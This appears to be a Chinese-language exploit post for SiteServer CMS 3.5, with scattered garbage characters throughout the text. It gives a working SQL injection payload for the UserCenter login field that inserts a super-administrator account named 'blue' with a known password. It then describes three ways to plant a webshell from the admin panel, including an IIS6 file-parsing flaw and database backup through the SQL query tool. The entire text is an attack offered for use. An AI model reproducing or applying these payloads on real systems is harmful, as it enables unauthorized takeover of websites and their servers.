经测试秒杀最新的3.5版
6 e! W* E6 y1 H q$ _stieserver官网:www.siteserver.cn* n* u3 r- Y5 O' l1 ?
EXP:
' E# Q( E( C5 v+ j直接访问UserCenter/login.aspx$ R( ~0 }" L. Z
用户名处输入:
$ A& N* }0 |1 w& v. t. N9 T2 ]- \
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
* p3 w# \* p- B3 M密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。- k8 o+ L7 I/ o* p: k W3 U* J
之后再访问后台SiteServer/login.aspx用插入的用户登陆8 R* B, p/ N$ U/ k+ ?2 x
后台拿webshell的三种方法:" ]0 H" U- @4 _: L* ~% Q6 V; _
一、
5 F0 j) ?3 x4 a: ^4 k6 T. Y O站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' J7 G" a0 Y$ u# N9 ]二、
1 m: P5 w, Z+ X成员权限-》添加用户-》用户名为:1.asp
/ {; Y; D) |0 M- R1 P8 ]http://127.0.0.1/usercenter/. p: c |* `- ?1 Q. i2 i* m) a
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
; v: D9 i6 z9 q(ps:后台添加用户时不会验证是否含有非法字符)8 P, f( ]) E0 \ s8 p
三、5 g3 Y& o$ v4 ~% Z h
系统工具-》实用工具-》机器参数查看
4 f6 W) `/ a5 q% c) I3 T* O# B可以看到数据库类型、名称,WEB路径
2 G. r6 m0 c% ?; d4 w系统工具-》数据库工具-》SQL语句查询
) q( j3 d$ I& F' k1 t$ k这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |